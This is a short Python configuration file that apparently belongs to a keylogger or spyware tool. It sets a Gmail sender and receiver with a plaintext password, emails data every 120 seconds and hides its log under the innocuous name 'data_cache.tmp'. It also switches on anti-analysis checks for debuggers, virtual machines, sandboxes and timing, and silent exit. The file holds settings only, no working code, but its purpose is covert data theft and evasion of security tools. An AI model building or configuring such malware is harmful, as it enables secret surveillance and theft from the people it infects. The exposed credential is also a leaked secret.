EMAIL_SENDER = 'tobi53154@gmail.com'
EMAIL_PASSWORD = 'xhxuyisjzxheesqz'
EMAIL_RECEIVER = 'tobi53154@gmail.com'

SEND_INTERVAL = 120
DEBUG = False
PERSISTENCE = False
LOG_FILE_NAME = "data_cache.tmp"
ENCRYPTION_KEY = 'super-secret-key-123'
ENCRYPT_LOGS = True
ANTIDETECT = True
THREAT_THRESHOLD = 2
CHECK_DEBUGGER = True
CHECK_TIMING = True
CHECK_VM = True
CHECK_SANDBOX = True
EXIT_SILENTLY = True
